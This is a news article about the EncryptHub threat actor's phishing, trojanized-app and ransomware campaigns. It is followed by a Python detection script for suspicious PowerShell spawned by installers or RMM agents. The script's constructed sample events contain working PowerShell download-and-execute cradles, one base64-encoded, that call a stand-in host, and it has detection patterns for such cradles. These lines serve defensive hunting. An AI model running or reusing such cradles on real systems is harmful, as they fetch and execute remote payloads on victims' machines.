
Mar 06, 2025 | Ravie Lakshmanan | Malware / Ransomware

A financially motivated threat actor tracked as EncryptHub has been linked to a series of phishing campaigns that deploy information stealers and ransomware; the actor is also developing a new product it calls EncryptRAT.

According to a recent report by Outpost24 KrakenLabs, EncryptHub targets users of popular applications by distributing trojanized versions of those applications. It has also used third-party Pay-Per-Install (PPI) distribution services to spread its malware.

The cybersecurity company described EncryptHub as a hacking group that frequently makes operational security errors, yet still incorporates exploits for widely used software flaws into its attack campaigns, which makes it a formidable threat despite the sloppiness.

EncryptHub, also tracked by Swiss cybersecurity company PRODAFT as LARVA-208, is believed to have become active towards the end of June 2024. The group relies on various approaches, ranging from SMS phishing (smishing) to voice phishing (vishing), in an attempt to trick prospective targets into installing remote monitoring and management (RMM) software.

PRODAFT informed The Hacker News that the spear-phishing group is affiliated with the RansomHub and BlackSuit ransomware operations. EncryptHub has been using advanced social engineering tactics to compromise high-value targets across multiple industries.

“The actor typically creates a phishing site that targets the organization to obtain the victim’s VPN credentials,” PRODAFT said. “The victim is then called and asked to enter the victim’s details into the phishing site for technical issues, posing as an IT team or helpdesk. If the attack targeting the victim is not a call but a direct SMS text message, a fake Microsoft Teams link is used to convince the victim.”

The phishing sites are hosted on bulletproof hosting providers like Yalishand. Once it has access, EncryptHub runs PowerShell scripts that deploy stealer malware such as Fickle, StealC, and Rhadamanthys. The ultimate goal of these attacks is to deliver ransomware and demand a ransom.

Another common method employed by the threat actor involves trojanized applications disguised as legitimate software for initial access. These counterfeit applications include fake versions of QQ Talk, QQ Installer, WeChat, DingTalk, VooV Meeting, Google Meet, Microsoft Visual Studio 2022, and Palo Alto GlobalProtect.

Once installed, these booby-trapped applications kick off a multi-stage chain that delivers follow-on payloads such as Kematian Stealer, which is used to steal browser cookies.
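Both intrusion paths above end the same way: PowerShell launched by something that should rarely launch it, either an RMM agent installed after a "helpdesk" call or a trojanized installer, and that PowerShell pulling a next stage from the network. The script below is an added detection example written for this page; it is not code from the article, Outpost24 or PRODAFT. The event fields are an assumption loosely modelled on Sysmon Event ID 1, every record in `sample_events()` is constructed for the demo, and the installer names, RMM product substrings and alert threshold are assumptions to tune for your own fleet.

```python
"""
Added example (not from the article, Outpost24 or PRODAFT): a small hunt over
process-creation events for PowerShell spawned by an RMM agent or an installer
that then runs a download cradle. Event fields and all sample records are
CONSTRUCTED; tool names and the threshold are assumptions.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Installer processes that should rarely launch PowerShell on a workstation (assumption).
INSTALLER_PARENTS = {"msiexec.exe", "setup.exe", "install.exe"}
# Substrings of legitimate RMM products (assumption). Their presence is not malicious;
# only a download cradle spawned from them is interesting here.
RMM_HINTS = ("screenconnect", "anydesk", "atera", "teamviewer", "rustdesk")
CRADLE_PATTERNS = {
    "IEX": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "DownloadString": re.compile(r"DownloadString|DownloadFile", re.I),
    "Invoke-WebRequest": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "FromBase64String": re.compile(r"FromBase64String", re.I),
}
SUSPICIOUS_FLAGS = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"e(?:xecution)?p(?:olicy)?\s+bypass)\b", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ALERT_THRESHOLD = 3  # assumption: parent (2) + cradle (2) or parent + flags + encoded


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: List[str]
    decoded: Optional[str]  # decoded -EncodedCommand payload, if any


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE text behind -enc/-EncodedCommand, or None if absent or invalid."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze(event: dict) -> Optional[Finding]:
    """Score one process-creation event; return a Finding when it crosses the threshold."""
    if PureWindowsPath(event["image"]).name.lower() not in POWERSHELL_IMAGES:
        return None
    parent_path = event["parent_image"].lower()
    parent = PureWindowsPath(parent_path).name
    cmd = event["command_line"]
    score, reasons = 0, []
    if parent in INSTALLER_PARENTS:
        score += 2
        reasons.append(f"spawned by installer {parent}")
    if any(hint in parent_path for hint in RMM_HINTS):
        score += 2
        reasons.append(f"spawned by RMM agent {parent}")
    if SUSPICIOUS_FLAGS.search(cmd):
        score += 1
        reasons.append("hidden/noprofile/bypass flags")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd}\n{decoded}"  # inspect the decoded payload too
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    if hits:
        score += 2
        reasons.append("download cradle: " + ", ".join(hits))
    if score < ALERT_THRESHOLD:
        return None
    return Finding(event["host"], event["user"], score, reasons, decoded)


def scan(events: List[dict]) -> List[Finding]:
    return [f for f in (analyze(e) for e in events) if f is not None]


def sample_events() -> List[dict]:
    """CONSTRUCTED sample events for the demo; not real telemetry."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return [
        {"host": "WS01", "user": "CORP\\alice", "parent_image": "C:\\Windows\\explorer.exe",
         "image": ps, "command_line": "powershell.exe -NoExit -Command Get-Date"},  # benign
        {"host": "WS01", "user": "CORP\\alice",  # trojanized installer in %TEMP%, hidden encoded cradle
         "parent_image": "C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe",
         "image": ps, "command_line": f"powershell.exe -nop -w hidden -enc {enc}"},
        {"host": "WS02", "user": "CORP\\bob",  # RMM agent installed after a "helpdesk" call
         "parent_image": "C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe",
         "image": ps, "command_line": "powershell.exe -ep bypass -c \"Invoke-WebRequest "
         "http://example.invalid/s.ps1 -OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1\""},
        {"host": "WS02", "user": "CORP\\bob", "parent_image": "C:\\Windows\\explorer.exe",
         "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe"},  # ignored
    ]


if __name__ == "__main__":
    for f in scan(sample_events()):
        print(f"{f.host} {f.user} score={f.score} :: " + "; ".join(f.reasons))
```

The parent-process check carries most of the weight on purpose: a PowerShell download cradle is noisy on its own, but one spawned by a just-installed RMM client or by an installer running out of a user's temp directory is the shape of the chain described above and is worth a look even before the stealer lands. Decoding `-EncodedCommand` in the rule rather than alerting on its mere presence keeps the cradle patterns applicable to the obfuscated case as well.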